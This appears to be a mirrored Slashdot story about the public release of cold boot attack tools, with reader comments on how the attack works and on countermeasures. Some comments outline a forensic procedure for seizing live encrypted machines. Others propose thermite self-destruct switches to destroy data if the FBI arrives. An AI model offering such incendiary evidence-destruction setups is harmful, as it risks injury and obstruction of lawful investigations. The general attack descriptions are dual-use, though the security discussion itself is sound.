Slashdot Mirror

← Back to Stories (view on slashdot.org)

Cold Boot Attack Utilities Released At HOPE Conference

Posted by Soulskill on from the shining-a-spotlight dept.

An anonymous reader writes "Jacob Appelbaum, one of the security researchers who worked on the cold boot attacks to recover encryption keys from memory even after reboot, has announced the release of the complete source code for the utilities at The Last HOPE in New York City. The hope (obligatory pun) is that the release of these tools will help to improve awareness of this attack vector and enable the development of countermeasures and mitigation techniques in both software and hardware. The full research paper (PDF) is also available."

20 of 113 comments (clear)

  1. RE: Editor/Submitter by Ihmhi · · Score: 4, Funny

    I think the editor and submitter both need to read this.

    --
    Random Thoughts From A Diseased Mind (Not For Dummies)
  2. Yup by Anonymous Coward · · Score: 2, Interesting

    I was there in the room when they released this attack. It was really an interesting idea of taking the memory out before decay happens and putting into another box to read stuff off of it. Of Course Physical security of a machine will solve this problem but it is a very interesting attack.

    1. Re:Yup by DAldredge · · Score: 2, Funny

      Because changing the laws of physics is hard.

  3. There are some ways to minimize the problem by Psionicist · · Score: 5, Interesting

    The way I see this, you should simply not store keys in memory (that is have your encrypted file system mounted) when you not need access to the files. A correct program will overwrite the keys when the file system is dismounted.

    The purpose of full disk encryption (or system encryption in TrueCrypt is), in my opinion, not meant as a "one password to protect everything". It's just an extra measure to secure temporary files, the swap file and other tracks the OS and applications may spread around. You should still encrypt your really secret files separately, and use basic precautions such as secure file erasure when you've used them.

    That said, I still don't think this attack is so important. If you have the file system mounted, and an attacker gains access to your computer, the files are already there!

    1. Re:There are some ways to minimize the problem by Anonymous Coward · · Score: 3, Interesting

      The whole point of this is unclean shutdown. How is your computer going to overwrite the keys in memory when someone pulls the plug?

      Sometimes the mere presence of a file, encrypted or not, is "incriminating" enough. Ask Kevin Mitnick about NSA.TXT on a floppy he had - it was a listing of a host with the registered users at the National Computer Security Archive, and that got quickly spun to "having compromised the security of the NSA".

      Sometimes you want to hid the existence of information, not just the information.

  4. because the fix would have to be in-hardware by Animaether · · Score: 5, Informative

    and not just the machine hardware, but rather the RAM stick itself.

    Essentially the exploit relies on data that is in RAM to still exist, even if it's just for a few seconds, if you take it out of the machine.

    You could add a 'write random crap to RAM' thing to your shutdown procedure, but that won't help if they simply power the machine off.
    The machine hardware could write random crap to RAM when it is powered down, but that won't help if they simply yank the RAM stick out while the machine is still running.

    So the RAM stick itself would have to detect that it is no longer connected to any motherboard and, using a charge kept in a capacitor, for example, flash itself with random crap.. or whatever.

    Keep in mind that this 'exploit' is quite difficult to execute, requiring not just physical access to the machine - but to the RAM. While the machine is running (or was running within the last N seconds, at least). In the vast majority of environments, that's going to be extremely difficult.. unless you own (or operate) that machine and you have no particular way of being caught.

    1. Re:because the fix would have to be in-hardware by Minwee · · Score: 4, Insightful

      Most server class machines have intrusion detection sensors which will trigger an alarm when the case is opened. They're hardly foolproof, but if you were concerned about this sort of attack then responding appropriately to a "Your Door Is Ajar" event would be a reasonable place to start.

    2. Re:because the fix would have to be in-hardware by jeiler · · Score: 2, Insightful

      You could add a 'write random crap to RAM' thing to your shutdown procedure, but that won't help if they simply power the machine off.

      Actually, one thing that might help would be a "Decrypt then wipe RAM" scheme, where the program decrypts a file, moves the file contents into some form of buffer, then wipes the RAM location where the decryption key was stored (and if necessary, wipe the paging file). It would leave that specific file exposed, but that's a heck of a lot better than leaving the key in RAM.

      --

      If you haven't been down-modded lately, you aren't trying.

      Sacred cows make the best hamburger.

    3. Re:because the fix would have to be in-hardware by Eternauta3k · · Score: 2, Insightful

      Unless they pot it, or stick it somewhere inaccessible. Of course, someone determined enough will find a workaround (I mean CIA, not random hacker)

      --
      Yeah. Would you choose a neurosurgeon who pokes around people's brains in his spare time? I wouldn't.
    4. Re:because the fix would have to be in-hardware by the_olo · · Score: 2, Informative

      But then you'd have to input your passphrase each time you open a bloody file. Well if there's only few very important files, it's acceptable.

    5. Re:because the fix would have to be in-hardware by jeiler · · Score: 2

      Security versus convenience. If you have no files (or relatively few files) that require this level of security, use a more convenient method.

      --

      If you haven't been down-modded lately, you aren't trying.

      Sacred cows make the best hamburger.

  5. Re:Memory wiper? by jonbryce · · Score: 5, Informative

    You cool the chips down in the running computer with a spray duster, pull them out, and put them in a computer that you control.

    No software solution can be used to stop you doing this, it has to be a hardware based solution.

  6. Re:Tamper proof case, anyone? by Sir_Lewk · · Score: 2, Interesting

    You can hardhack your way around any hardhack.

    --
    "linux is just DOS with a UNIX like syntax" -- Galactic Dominator (944134)
  7. Capturing machines with full disk encryption by Animats · · Score: 5, Interesting

    Here's the existing approach to this problem.

    1. Send in SWAT team. Stop user from turning off computer.
    2. Bring in HotPlug kit and UPS.
    3. Plug "Mouse Jiggler" into USB port to keep no-activity timeout from causing logout.
    4. Turn on UPS.
    5. Plug HotPlug unit into UPS.
    6. Plug HotPlug unit output plug (a male plug which is a power output) into power strip, or, if necessary, remove wall outlet plate and connect clamp-on connectors to hot wires.
    7. Unplug power strip from line power. HotPlug unit will switch in power from UPS.
    8. Plug power strip into UPS. HotPlug unit will recognize this and deenergize its output plug.
    9. Unplug HotPlug output plug and input plug. Computer is now running entirely on UPS.
    10. Carry computer and UPS to forensics lab before UPS battery runs down.
    11. Plug in UPS to keep battery charged.
    12. Access disk as desired.
    1. Re:Capturing machines with full disk encryption by Chris+Burkhardt · · Score: 3, Funny

      13. Try not to get hit by truck as you maneuver Frogger machine across street.

      --
      "And there be unix which have made themselves unix for the kingdom of heaven's sake." - Matt. 19:12
    2. Re:Capturing machines with full disk encryption by Eternauta3k · · Score: 3, Funny

      looks like a forced login every 10 minutes is a good idea for people working with really sensitive data.

      108 minutes is more like it

      --
      Yeah. Would you choose a neurosurgeon who pokes around people's brains in his spare time? I wouldn't.
  8. Re:Tamper proof case, anyone? by kesuki · · Score: 3, Insightful

    thermite packed around the ram seems the best way to go. then if they tamper with the case, it triggers a 'tramper switch' the thermite goes off, and boom just a molten blob of goo. also, if you're going to have a self destruct on the ram, you may as well do the HDD as well, and you might as well throw in a manual switch along with the 'tamper switch' in case the FBI comes knocking, and have a good plan for how to circumvent your 'tamper switch'.

    thermite is a bit extreme, but if you want your data irretrievably destroyed, there is nothing like thermite.

    --
    https://www.gnu.org/philosophy/free-sw.html
  9. Re:Tamper proof case, anyone? by rwillard · · Score: 2, Interesting

    While it's true that you can bypass any hardhack security system, surprise can be a great asset. Most people, even Law Enforcement, aren't going to expect your computer to fry itself if opened, or whatever system you use. It's the kind of trick that will only work a few times, but a few times is probably enough.

    A lot of the new 'cool' law enforcement devices are USB, for easy access and easy reading of the computer. Imagine a computer that has three in-use USB ports and one open slot, and plugging a device into the open slot (or plugging a new device in by removing an existing one without disabling the security feature) would cause the computer to fry itself.

    Is it foolproof? No, but it'd be a start.

  10. Re:Memory wiper? by freddy_dreddy · · Score: 2, Interesting

    You can store the keys in video memory, you can't pull those out of a laptop. And yes, it's not only possible but also rather easy. Storing them in the lower part (first 64kb ?) which is used to display the "boot screen" will actually create an automatic sweep. Both backdoors locked.

    --
    "Violence is the last refuge of the competent, and, generally, the first refuge of the incompetent" - Thing_1
  11. A candidate for the Darwin Awards by Anonymous Coward · · Score: 2, Funny

    So, do you use this thermite enabled system on your LAPtop?